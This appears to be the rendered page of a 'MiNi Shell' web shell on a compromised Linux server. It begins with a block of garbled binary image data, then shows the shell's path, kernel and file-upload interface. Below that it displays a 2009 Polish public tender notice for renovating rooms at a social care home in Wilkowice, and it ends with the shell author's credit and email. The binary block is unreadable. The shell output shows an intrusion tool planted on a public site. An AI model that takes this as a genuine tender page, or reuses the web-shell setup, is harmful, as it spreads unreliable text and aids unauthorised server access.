JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090525/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090525/164336-N-2009.html

<p class="kh_header"><b>Wilkowice: Adaptacja pomieszczeń kuchni na pokoje mieszkalne</b><br>
<b>Numer ogłoszenia: 164336 - 2009; data zamieszczenia: 25.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej , ul. Kościelna 5, 43-365 Wilkowice, woj. śląskie, tel. 0-33 8171491, faks 0-33 8170188.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Adaptacja pomieszczeń kuchni na pokoje mieszkalne.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są prace adaptacyjne pomieszczeń kuchni na pokoje mieszkalne dla podopiecznych obejmujące zakres robót wymiany stolarki okiennej i drzwiowej, wykonania instalacji sanitarnej, demontażu i montażu elementów instalacji sanitarnej, demontażu i wykonania instalacji elektrycznej, remontu pomieszczeń wraz z nową posadzką, wykonaniem tynków, malowaniem i położeniem gładzi gipsowych na ścianach i sufitach, ułożeniem na nich płytek ceramicznych według uzgodnień z Inwestorem, malowanie pomieszczeń kolorami uzgodnionymi z Inwestorem.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.07-, 45.10.00.00-8, 45.31.00.00-3, 45.33.00.00-9, 45.40.00.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 100.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki:

1. 	Posiadają uprawnienia do wykonywania określonej działalności lub czynności  zgodnie z wymaganiami ustawowymi. 
Ocena spełnienia warunku - dostarczenie oświadczenia i dokumentu opisanego
w Części VI pkt VI.II, ppkt 1 i 2 SIWZ.

2. Posiadają niezbędną wiedzę i doświadczenie do wykonania zamówienia  
i wykonali w ciągu ostatnich 3 lat przed dniem wszczęcia postępowania 
o udzielenie zamówienia ( a jeżeli okres prowadzenia działalności jest krótszy 
- w tym okresie)  - co najmniej jedną robotę budowlaną odpowiadającą swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia
Ocena spełnienia warunku - dostarczenie dokumentów opisanych w Części VI pkt
VI.II, ppkt 6 i 7 SIWZ.

3. 	Dysponują potencjałem technicznym niezbędnym do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego do wykonania zamówienia.
Ocena spełnienia warunku - złożenie oświadczenia opisanego w Części VI 
pkt VI. II, ppkt 1 SIWZ.

3. Dysponują osobami zdolnymi do wykonania zamówienia lub przedstawią 
Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, w szczególności dysponują osobami uprawnionymi do pełnienia samodzielnych funkcji technicznych w budownictwie, tj. dysponują kierownikiem robót posiadającym uprawnienia budowlane w specjalności konstrukcyjno-budowlanej oraz należącym do OIIB i posiadającym wymagane ubezpieczenie od odpowiedzialności cywilnej.
Ocena spełnienia warunku - złożenie dokumentów wymienionych
w Części VI pkt VI.II, ppkt 8 i 9 SIWZ

5. 	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
Ocena spełnienia warunku - złożenie oświadczenia opisanego w Części VI pkt VI.II, ppkt 1, 3 i 4 SIWZ

6. Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art.22 i 24. ustawy Prawo zamówień publicznych - w przypadku wykonawców działających wspólnie dotyczy każdego współwykonawcy z osobna.
Ocena spełnienia warunku - na podstawie złożonych oświadczeń i dokumentów
opisanych w Części VI SIWZ.

7. 	Akceptują warunki zawarte w niniejszej specyfikacji istotnych warunków zamówienia wraz z załącznikami i przyjmują je bez zastrzeżeń.
Ocena spełnienia warunku - złożenie oświadczenia na formularzu oferty
Przetargowej, załącznik nr 1 do SIWZ

Ocena spełnienia warunków będzie polegać na sprawdzeniu kompletności 
i poprawności złożonych dokumentów i oświadczeń według zasady :
spełnia / nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawca winien dostarczyć dokumenty składające się na ofertę:

1.Oryginał Oferty przetargowej sporządzony na formularzu (Oferta ) stanowiącym Załącznik nr 1 do SIWZ
2. Kosztorys ofertowy sporządzony na podstawie rozporządzenia Ministra Rozwoju Regionalnego i Budownictwa z 13 lipca 2001 r. w sprawie metod kosztorysowania obiektów i robót budowlanych (Dz. U. z 2001r. Nr 80, poz. 867), w oparciu o przedmiary robót i specyfikacje techniczne wykonania i odbioru robót, obejmujący wycenę poszczególnych elementów zamówienia z cenami jednostkowymi i wyszczególnieniem składników ceny (w szczególności rg, kp, zysk itp.) i ceną oferty.
Wskazanym jest złożenie kosztorysu w formie uproszczonej, ale dopuszcza się również kosztorys w formie szczegółowej. 
Kosztorys uproszczony winien zawierać ilości robót i cenę jednostkową dla każdej pozycji kosztorysowej, tabelę elementów scalonych, w której będą wyszczególnione składniki ceny -rg, kp, zysk.
3. Wykaz robót - części zamówienia, których wykonanie wykonawca zamierza
powierzyć podwykonawcom. Załącznik nr 8
4. Pełnomocnictwo (udzielone przez wszystkich wykonawców ubiegających się
wspólnie o zamówienie) do reprezentowania podmiotów występujących wspólnie (spółki cywilne, konsorcja). Z powyższego dokumentu powinien wynikać zakres udzielonego pełnomocnictwa.
5.Wykaz materiałów i urządzeń - w przypadku zastosowania przez wykonawcę materiałów i urządzeń innych niż te zaproponowane przez zamawiającego z wyszczególnieniem danych określonych w części III. pkt  3 (Inne uwarunkowania )ppkt d. niniejszej SIWZ
6. Oświadczenie Wykonawcy (na formularzu oferty - załącznik nr 1 do SIWZ):
- o zdobyciu informacji koniecznych do sporządzenia oferty,
- o zapoznaniu się z warunkami przetargu zawartymi w specyfikacji istotnych
warunków zamówienia wraz z załącznikami i przyjęciu ich bez zastrzeżeń
- o zobowiązaniu się do zawarcia umowy na warunkach określonych we wzorze
umowy (Załącznik nr 3 do SIWZ).

Oświadczenia i dokumenty potwierdzające spełnienie przez wykonawcę
warunków udziału w postępowaniu:

1. Oświadczenie w trybie art. 22 ust. 1 ustawy Prawo zamówień publicznych (Dz. U. Nr 19, poz. 177 z późn. zm., tekst jednolity z 2008 r Dz. U. nr 171,poz.1058 ), zwanej dalej ustawa Pzp - Załącznik nr 2 do nin. SIWZ
2. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie 
o wpisie do ewidencji działalności gospodarczej 
W przypadku przedsiębiorców występujących wspólnie, zaświadczenie 
o wpisie do ewidencji działalności gospodarczej lub odpis z właściwego rejestru dla każdego ze wspólników) - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3. Zaświadczenie właściwego Naczelnika Urzędu Skarbowego lub oświadczenie Wykonawcy, że Wykonawca nie zalega z opłacaniem podatków ( lub uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności ) - wystawione nie wcześniej niż 3 miesiące od terminu składania ofert.
4. Zaświadczenie właściwego Oddziału ZUS ( KRUS ) lub oświadczenie Wykonawcy, że Wykonawca nie zalega z opłacaniem składek ( lub uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych składek ) - wystawione nie wcześniej niż 3 miesiące od terminu składania ofert.
5. Informacji z Krajowego Rejestru Karnego lub oświadczenia Wykonawcy 
( albo równoważnego zaświadczenia właściwego organu sądowego, administracyjnego kraju pochodzenia lub zamieszkania osoby ) w zakresie określonym:
- art. 24 ust. 1 pkt. 1 - 8 ustawy Pzp,
- art. 24 ust. 1 pkt. 9 ustawy Pzp
6. Wykaz robót wykonanych przez wykonawcę w okresie ostatnich 3 lat przed
Dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - robót budowlanych stanowiących przedmiot zamówienia, z podaniem ich wartości, zakresu robót oraz daty i miejsca wykonania.
7.Dokumenty potwierdzające, że wymienione - zgodnie z pkt. 6 - roboty zostały wykonane należycie (referencje zamawiających, ewentualnie kopie protokółów odbioru).
8.Oświadczenie o dysponowaniu osobami zdolnymi do wykonania zamówienia oraz wykaz tych osób, a ponadto:
8.1. Kserokopia uprawnień budowlanych kierownika robót.
8.2. Aktualne zaświadczenie o wpisie do Okręgowej Izby Inżynierów Budownictwa i ubezpieczeniu od odpowiedzialności cywilnej kierownika robót

Uwaga:  
Wszystkie dokumenty składane w formie kserokopii winny być poświadczone za zgodność z oryginałem przez wykonawcę, tj. posiadać adnotację np. za zgodność z oryginałem, opatrzoną odręcznym podpisem
osoby podpisującej ofertę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 90</li>
<li>2 - Termin wykonania zamówienia - 10</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat.bielsko.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej w Wilkowicach
43-365 Wilkowice ul. Kościelna 5..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.06.2009 godzina 11:00, miejsce: Sekretariat Domu Pomocy Społecznej w Wilkowicach ul. Kościelna 5. 43-365 Wilkowice.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com